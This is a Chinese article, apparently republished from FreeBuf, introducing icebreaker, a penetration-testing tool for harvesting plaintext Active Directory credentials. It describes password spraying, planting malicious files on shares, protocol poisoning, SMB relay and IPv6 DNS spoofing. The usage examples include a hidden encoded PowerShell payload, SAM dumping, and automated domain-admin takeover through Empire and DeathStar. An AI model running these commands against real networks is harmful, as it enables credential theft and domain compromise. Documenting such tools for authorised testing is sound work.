前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >如何使用icebreaker在外部环境中获取活动目录明文凭证

如何使用icebreaker在外部环境中获取活动目录明文凭证

作者头像
FB客服
发布2023-03-29 15:57:25
4240
发布2023-03-29 15:57:25
举报
文章被收录于专栏:FreeBuf

 关于icebreaker 

icebreaker是一款针对活动目录凭证安全的研究工具,在该工具的帮助下,广大研究人员能够在活动目录环境之外(但在内部网络中)获取目标活动目录的明文凭证。

该工具会对目标活动目录以自动化的方式进行五次内部渗透测试,并尝试获取明文凭证。除此之外,我们还可以使用--auto选项来以自动化的形式获取域管理员权限。

 工具运行机制 

1、反向爆破:自动获取用户名列表,并使用两个最常用的活动目录密码测试每个用户名(两次以上的尝试可能会触发帐户锁定策略); 2、上传网络共享:通过将恶意文件上传到可用网络共享来捕获用户的密码; 3、渗透广播网络协议:使用常见的网络协议欺骗用户的计算机向我们发送密码; 4、中间人SMB连接:对活动目录计算机执行远程命令以收集密码; 5、渗透IPv6 DNS:利用DNS欺骗活动目录计算机将其用户密码发送给我们;

 工具安装 

广大研究人员可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/DanMcInerney/icebreaker.git

(向右滑动,查看更多)

接下来,我们需要以root权限执行下列命令以安装icebreaker:

代码语言:javascript
复制
./setup.shpipenv install --threepipenv shell
代码语言:javascript
复制

如果安装出问题的话,请将pipenv更新到最新版本:

代码语言:javascript
复制
apt-get remove python-pipenv && python setup.py install

(向右滑动,查看更多)

代码语言:javascript
复制

Docker安装

我们还可以通过Docker来使用icebreaker,安装命令如下:

代码语言:javascript
复制
docker build --rm -t danmcinerney/icebreaker .docker run danmcinery/icebreaker

 工具使用 

以root权限运行,并从一个IP地址列表(单个IP或CIDR范围)中读取目标:

代码语言:javascript
复制
./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."

(向右滑动,查看更多)

代码语言:javascript
复制

从主机列表中读取,告诉Responder使用eth0接口而不是默认网关接口,让Responder运行30m而不是通常的10m,并运行默认的ntlmrelayx命令以将SAM转储到目标服务器:

代码语言:javascript
复制
./icebreaker -l targets.txt -i eth0 -t 30 -c default

(向右滑动,查看更多)

代码语言:javascript
复制

使用一个Nmap XML输出文件,跳过所有五次攻击,并为反向爆破使用自定义密码列表:

代码语言:javascript
复制
./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt

(向右滑动,查看更多)

用后即弃方法:

输入目标文件,抓取companydomain.com以获取要添加到反向爆破中的电子邮件用户名,跳过mitm6的IPv6 DNS投毒,并在攻击4开始后在tmux或xterm窗口中运行Empire和DeathStar以获得自动域管理:

代码语言:javascript
复制
./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]

(向右滑动,查看更多)

代码语言:javascript
复制

 许可证协议 

本项目的开发与发布遵循MIT开源许可证协议。

 项目地址 

icebreaker

https://github.com/DanMcInerney/icebreaker

参考资料:

https://www.powershellempire.com/ https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html https://github.com/danielmiessler/SecLists/blob/601038eb4ea18c97177b43a757286d3c8a815db8/Passwords/merged.txt.tar.gz

精彩推荐

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  •  关于icebreaker 
  •  工具运行机制 
  •  工具安装 
  • (向右滑动,查看更多)
  • (向右滑动,查看更多)
    • Docker安装
    •  工具使用 
    • (向右滑动,查看更多)
    • (向右滑动,查看更多)
    • (向右滑动,查看更多)
    • (向右滑动,查看更多)
    •  许可证协议 
    •  项目地址 
    • 参考资料:
    相关产品与服务
    容器服务
    腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档